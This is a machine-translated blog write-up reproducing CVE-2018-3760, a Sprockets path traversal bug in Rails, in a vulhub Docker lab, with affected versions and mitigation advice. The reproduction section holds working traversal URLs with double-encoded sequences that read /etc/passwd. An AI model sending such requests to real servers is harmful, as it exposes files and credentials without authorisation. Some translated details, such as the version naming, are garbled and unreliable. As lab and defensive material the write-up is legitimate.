CVE-2018-3760 vulnerability reproduce (read arbitrary files)

Others 2020-01-13 21:47:44 views: null

CVE-2018-3760 vulnerability reproduce (read arbitrary files)

0x00 introduce vulnerabilities

Ruby On Rails is a well-known Ruby Web development framework that uses the sprocket as a development environment in a static file server. Sprockets is a Ruby library compile and distribute static resource files.
In Ruby 3.7.1 and earlier, the presence of the path traversed by the auxiliary decoder due to the vulnerability. An attacker can use% 252e% 252e / access the root directory and read or execute any files on the target server.

Here Insert Picture Description

0x01 vulnerability principle

The problem lies in sprockets, which is used to check the interdependencies JavaScript files, js files to optimize web pages introduced in order to avoid unnecessary load js files.
When accessing such as http://127.0.0.1:3000/assets/foo.js, it will enter server.rb:
rorbidden_request path used to check whether the path includes ... to prevent cross, whether it is an absolute path:

0x02 Affects Version

4.0.0.beta7 and earlier versions
3.7.1 and earlier versions
2.12.4 and earlier.

0x03 vulnerability repair

In a Rails application, to resolve this issue, set config.assets.compile = false, and then
use config.public_file_server.enabled = true and precompiled assets in the initialization process.

Can not resolve this problem in all managed environment, we recommend you to upgrade.

patch

To help users not to upgrade immediately
they use git-am format, and includes a change set.

  • 4-0-fix-path-traversal.patch-4.0.x release series of patches
  • 3-7-fix-path-traversal.patch-3.7.x release series of patches
  • 2-12-fix-path-traversal.patch-2.12.x version of the series of patches

0x04 environmental vulnerability

[cd vulhub-master/]
[cd rails/]
[cd CVE-2018-3760/]
[docker-compose up -d]
[docker-compose up -d]
[http://192.168.168.137:3000]

Here Insert Picture DescriptionHere Insert Picture DescriptionHere Insert Picture DescriptionHere Insert Picture Description

0x05 reproducible vulnerability

[http://192.168.139.137:3000/assets/file:%2f%2f/etc/passwd]
[http://192.168.139.137:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd]
Here Insert Picture DescriptionHere Insert Picture DescriptionHere Insert Picture Description

[Through error page, you can get the permission of the directory listing. Wherein a jump to the directory, such as / usr / src / blog / app / assets / images, then% 252e% 252e / a layer jump up, and finally reading / etc / passwd:]

Here Insert Picture Description

Chihiro (Spirited Away)
Published 222 original articles · won praise 32 · views 70000 +
Private letter concerns

Guess you like

Origin blog.csdn.net/qq_41901122/article/details/103879565
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com